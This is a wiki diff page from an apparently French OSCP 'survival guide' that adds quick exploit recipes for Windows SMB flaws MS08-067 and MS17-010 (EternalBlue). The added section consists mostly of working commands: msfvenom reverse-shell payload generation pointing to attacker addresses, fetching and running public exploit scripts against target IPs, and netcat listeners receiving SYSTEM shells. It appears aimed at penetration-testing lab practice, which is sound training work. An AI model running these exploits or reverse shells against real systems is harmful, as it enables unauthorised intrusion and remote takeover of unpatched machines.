Outils d'utilisateurs

Outils du Site


oscp_survival_guide

Différences

Cette page vous donne les différences entre la révision choisie et la version actuelle de la page.

Lien vers cette vue

oscp_survival_guide [2020/09/12 17:54]
cabusar
oscp_survival_guide [2020/10/14 21:29] (Version actuelle)
M0N5T3R
Ligne 2718: Ligne 2718:
 -   Transfer files to windows machines -   Transfer files to windows machines
     https://blog.netspi.com/15-ways-to-download-a-file/     https://blog.netspi.com/15-ways-to-download-a-file/
 +    
 +EDIT:
 +- Useful and fast exploit :
 +
 +
 +exploit SMB VULN MS08-067 : https://0xdf.gitlab.io/2019/02/21/htb-legacy.html
 +msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.26 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode -a x86 --platform windows
 +wget https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py
 +on copie le shellcode dans le commentaire
 +python ms08-067.py 10.10.10.4 6 445
 +root@kali:~/OSCP/VMs/10.10.10.4/MS17-010# netcat -lnvp 443
 +listening on [any] 443 ...
 +C:\WINDOWS\system32>
 +
 +
 +exploit SMB VULN MS1710 MS017-10
 +git clone https://github.com/SecureAuthCorp/impacket
 +cd impacket/
 +pip install .
 +git clone https://github.com/helviojunior/MS17-010.git
 +msfvenom -p windows/shell_reverse_tcp LHOST=10.11.17.228 LPORT=443  -f exe -o ms17-010.exe
 +python send_and_execute.py 10.10.175.236 ms17-010.exe 
 +root@kali:~/OSCP/VMs/10.10.14.36/MS17-010# netcat -lnvp 443
 +listening on [any] 443 ...
 +C:\WINDOWS\system32>
 +
 +
 +    
 </code> </code>
oscp_survival_guide.txt · Dernière modification: 2020/10/14 21:29 par M0N5T3R